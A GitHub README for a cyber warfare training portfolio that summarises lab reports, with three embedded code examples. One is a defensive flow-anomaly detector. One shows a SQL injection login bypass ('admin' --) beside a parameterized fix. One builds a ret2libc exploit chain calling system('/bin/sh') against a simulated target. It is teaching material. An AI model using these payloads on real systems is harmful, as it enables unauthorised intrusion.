This repository collects the lab projects I submitted as part of the International Cybersecurity and Digital Forensic Academy (ICDFA) Advanced Cyber Warfare Programme.
🔗 Documentation: GitHub; YouTube
The ACW801 folder collects research, strategic analysis, and policy recommendations on cyber warfare, offensive cyber operations, and international cyber law. Written for the ICDFA Advanced Cyber Warfare Programme, these reports provide technical, geopolitical, and legal insight into modern cyber conflicts. It includes the following resources:
📄 1: Dissecting Stuxnet - Anatomy of a Cyber Weapon
📄 2: Strategic Cyber Operation Report - Operation Shadow Strike; PowerPoint: Operation Shadow Strike
📄 3: International Cyber Warfare Laws & Ethics
📄 Policy Memo: Preventing Future Cyber Weapons Escalation
The ACW802 directory contains hands-on lab documentation and practical exercises, focusing on offensive cybersecurity operations and malware analysis environments. The labs are designed to simulate real-world attack scenarios and prepare environments for advanced threat analysis and penetration testing.
📄 ACW802_OperationShadowStrike, YouTube
📄 ACW802_FlareVM_SetUp, YouTube
📄 ACW803_Dynamic Malware Analysis: Behavioral Profiling of a Suspicious Executable, YouTube
Operation Blacktrace investigates a stealthy breach of ICDFA's internal network, in which analysis of a packet capture (PCAP) showed internal traffic being redirected to an attacker-controlled server. The attacker exfiltrated data, escalated privileges using stolen credentials, and conducted internal reconnaissance without deploying malware. The case underscores the risk of fileless attacks and the need for network segmentation, anomaly-based detection, and hardened proxy configurations.
📄 ACW803_Operation Blacktrace, YouTube
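The anomaly-based detection the report recommends can be sketched over per-connection flow records of the kind a capture like Blacktrace's yields once summarised. The following is an added example, not code or data from the lab: the flow lines, the internal range `10.20.0.0/16`, the sanctioned proxy `10.20.1.5:3128` and the egress threshold are all constructed assumptions. It flags two things the narrative describes: proxy-port traffic leaving for a host that is not the approved proxy, and an internal host pushing an unusual byte volume to external addresses.

```python
"""Anomaly checks over flow records summarised from a packet capture.
Every value below is constructed for this example; the addresses, the
sanctioned proxy and the threshold are assumptions, not lab details."""
import ipaddress
from collections import defaultdict

INTERNAL_NET = ipaddress.ip_network("10.20.0.0/16")   # assumed internal range
SANCTIONED_PROXY = ("10.20.1.5", 3128)                 # assumed approved egress proxy
EXFIL_BYTES = 50_000_000                               # assumed per-host egress threshold

# Constructed flow records: timestamp,src_ip,dst_ip,dst_port,bytes_out
SAMPLE_FLOWS = """\
2024-03-01T09:00:01,10.20.4.17,10.20.1.5,3128,1200
2024-03-01T09:00:05,10.20.4.17,10.20.1.5,3128,900
2024-03-01T09:01:10,10.20.4.22,10.20.1.5,3128,1500
2024-03-01T09:02:00,10.20.4.22,203.0.113.44,3128,65000000
2024-03-01T09:02:30,10.20.4.22,203.0.113.44,443,2000
2024-03-01T09:03:00,10.20.4.31,10.20.1.5,3128,800
"""


def parse_flows(text):
    """Turn the CSV-style records into (ts, src, dst, port, bytes) tuples."""
    rows = []
    for line in text.strip().splitlines():
        ts, src, dst, port, nbytes = line.split(",")
        rows.append((ts, src, dst, int(port), int(nbytes)))
    return rows


def is_internal(ip):
    return ipaddress.ip_address(ip) in INTERNAL_NET


def find_proxy_redirects(flows):
    """Internal hosts sending proxy-port traffic to anything other than the
    sanctioned proxy: the signature of a hijacked proxy setting."""
    return [(ts, src, dst) for ts, src, dst, port, _ in flows
            if is_internal(src) and port == SANCTIONED_PROXY[1]
            and (dst, port) != SANCTIONED_PROXY]


def find_exfil_candidates(flows):
    """Internal hosts whose byte volume to non-internal destinations exceeds
    the threshold. Traffic via the sanctioned proxy stays inside INTERNAL_NET
    and is therefore not counted here."""
    totals = defaultdict(int)
    for _, src, dst, _, nbytes in flows:
        if is_internal(src) and not is_internal(dst):
            totals[src] += nbytes
    return {host: total for host, total in totals.items() if total > EXFIL_BYTES}


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for alert in find_proxy_redirects(flows):
        print("proxy redirect:", alert)
    for host, total in find_exfil_candidates(flows).items():
        print(f"exfil candidate: {host} sent {total} bytes externally")
```

On the constructed data, host 10.20.4.22 is flagged by both checks: it first talks to the real proxy, then starts sending proxy-port traffic to 203.0.113.44 and moves 65 MB there. In a real deployment the proxy allow-list and threshold come from a baseline of normal traffic, which is the point of anomaly-based detection over signature matching.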
This strategic lab assesses the national security risks of cyberattacks on critical infrastructure (CI), including energy grids, healthcare systems, and financial networks. It explores nation-state motivations, real-world attacks like Industroyer2, and outlines a comprehensive resilience framework. The document emphasizes Zero Trust, threat modeling, OT security, cross-sector collaboration, and rapid response capabilities to defend against state-sponsored campaigns.
📄 ACW804_CyberWarfare in Critical Infrastructure
This module delivers a comprehensive assessment of cyber warfare strategies, operational tactics, and their implications in modern defense and national security. The content includes a detailed written report and presentation slides, covering threat actor profiling, operational impact forecasting, and resilience recommendations. Designed for both strategic planners and cybersecurity practitioners, ACW901 bridges theoretical frameworks with real-world case studies to enhance understanding of cyber operations in conflict scenarios.
📄 ACW901_CyberWarfare_Analysis Report
📄 Slides for ACW901_CyberWarfare_Analysis
This lab simulates a nation-state-level cyber operation targeting the OPSPORTAL v2.1.4 logistics command system. Through advanced web exploitation, including SQL Injection and misconfiguration analysis, the assessment uncovered critical vulnerabilities leading to credential leaks, exposed cryptographic keys, and database compromise. The exercise demonstrates real-world APT methodologies spanning reconnaissance, exploitation, and data exfiltration while providing key defensive recommendations to strengthen national-level cyber resilience and critical infrastructure protection.
📄 ACW902_- Operation BLACK FOG
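The SQL injection class exploited against the logistics portal comes down to one coding decision: whether user input is concatenated into the statement or bound as a parameter. The following is an added example, not OPSPORTAL code or data; the `users` table, its rows and the plaintext passwords are constructed (real systems store hashes; plaintext is kept here only so the injected comparison stays visible). It shows the same login query in both forms and the classic `admin' --` payload succeeding against one and failing against the other.

```python
"""Login query built two ways. The schema, rows and passwords are constructed
for this example; the portal's real code and data are not on this page."""
import sqlite3


def make_db():
    """In-memory stand-in for the application's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "correct-horse", "commander"), ("clerk", "battery-staple", "operator")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into SQL: a quote in the input ends the string
    literal and everything after it is parsed as SQL syntax."""
    query = (f"SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()


def login_safe(conn, username, password):
    """Bound parameters: the driver sends values separately from the statement,
    so quotes and comment markers in the input are just characters."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "admin' --"   # closes the string literal, comments out the password check
    print("vulnerable:", login_vulnerable(db, payload, "wrong"))
    print("safe:      ", login_safe(db, payload, "wrong"))
```

With the payload, the vulnerable query becomes `... WHERE username = 'admin' --' AND password = 'wrong'`, so the password clause is never evaluated and the commander row is returned. The parameterized version looks for a user literally named `admin' --` and finds nothing. The same discipline applies to every query in the application, including the ones that read configuration or key material, which is where the report's exposed cryptographic keys come from once the database is in reach.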
ACW903 examines the full exploit-development lifecycle: from fuzzing and crash triage to PoC creation, payload construction, and advanced bypasses (ROP/ret2libc) used to defeat DEP/NX and ASLR. The module blends hands-on techniques with real-world case studies (EternalBlue, Baron Samedit) to show how multiple bugs are chained into reliable exploits and what defenders must do—patching, memory hardening, EDR and layered mitigations—to raise the attacker’s cost.
📄 ACW903: Weaponizing Vulnerabilities - Exploit Development
📄 Slides for ACW903: Weaponizing Vulnerabilities - Exploit Development
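Two of the lifecycle steps the module describes, crash triage and payload construction, can be shown end to end against a simulated target. The following is an added example and not the module's own material: the target is a stand-in function rather than a real binary, the distance to the saved return address (112 bytes) and the 32-bit libc addresses for `system()`, `exit()` and the `"/bin/sh"` string are assumed values, as if read from a debugger or an info leak with ASLR disabled. The pattern and offset logic is the standard Metasploit-style approach and works unchanged against a real crash.

```python
"""Crash triage and ret2libc payload layout for a 32-bit stack overflow.
The target is simulated; the offset and libc addresses are assumed values
(as from a debugger or an info leak), not taken from the lab."""
import string
import struct

SAVED_RET_OFFSET = 112           # assumed: bytes from buffer start to saved EIP
SYSTEM_ADDR = 0xF7E1F3B0         # assumed libc system() address (ASLR off or leaked)
EXIT_ADDR = 0xF7E12DC0           # assumed libc exit() address
BINSH_ADDR = 0xF7F5E0AF          # assumed address of "/bin/sh" inside libc


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...), built so that a 4-byte window
    identifies one position; pattern_offset checks that the match is unique."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the 20280-byte pattern space")


def pattern_offset(pattern, reg_value):
    """Offset of the 4 bytes that landed in a 32-bit register, given the
    register's little-endian value; None if absent or ambiguous."""
    needle = struct.pack("<I", reg_value)
    idx = pattern.find(needle)
    if idx == -1 or pattern.find(needle, idx + 1) != -1:
        return None
    return idx


def simulated_crash_eip(payload):
    """Stand-in for running the target under a debugger: returns the value the
    saved return address was overwritten with, or None if it was not reached."""
    window = payload[SAVED_RET_OFFSET:SAVED_RET_OFFSET + 4]
    if len(window) < 4:
        return None
    return struct.unpack("<I", window)[0]


def ret2libc_payload(offset):
    """padding | system() | fake return address for system() | "/bin/sh" pointer.
    Returning into libc runs no injected code from the stack, which is why
    DEP/NX alone does not stop it; ASLR is what forces the address leak."""
    return b"A" * offset + struct.pack("<III", SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR)


def triage_and_build(max_len=300):
    """Full loop: send a pattern, read the crash register, compute the offset,
    build the chain. Returns (offset, payload)."""
    pattern = cyclic_pattern(max_len)
    eip = simulated_crash_eip(pattern)
    offset = pattern_offset(pattern, eip) if eip is not None else None
    if offset is None:
        raise RuntimeError("could not locate EIP control within max_len bytes")
    return offset, ret2libc_payload(offset)


if __name__ == "__main__":
    offset, payload = triage_and_build()
    print(f"EIP controlled at offset {offset}; payload is {len(payload)} bytes")
```

Against the simulated target the crash register reads `0x64413764` (the bytes `d7Ad`), which the lookup maps to offset 112, and the resulting chain is 124 bytes. On a real target the same steps apply with the register value copied from the debugger; the only extra work under ASLR is obtaining the libc base from a leak before filling in the three addresses.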
Operation AEGIS SHIELD simulates a full-scale defensive cyber operation under live adversary conditions, focusing on real-time command decision-making, containment, and intelligence escalation. The exercise follows the cyber kill chain from delivery to command-and-control, detailing the defense against the IRON VORTEX threat group’s attempted intrusion on the POSEIDON Maritime Logistics Network. Through structured injects, forensic response, and situational reporting, the module highlights the integration of active defense, evidence preservation, and operational leadership within a nation-state cyber defense framework.
📄 ACW904 – Operation AEGIS SHIELD
These labs are part of the International Cybersecurity and Digital Forensic Academy (ICDFA) Advanced Cyber Warfare Programme. These materials are intended for educational and defensive purposes only. By using them you agree to abide by applicable laws and institutional policies. Do not use the techniques on systems you do not own or have explicit authorization to test. Contributions, issue reports, and enhancements are welcome through pull requests.
For inquiries or discussions, feel free to reach out via LinkedIn | GitHub | Medium | YouTube.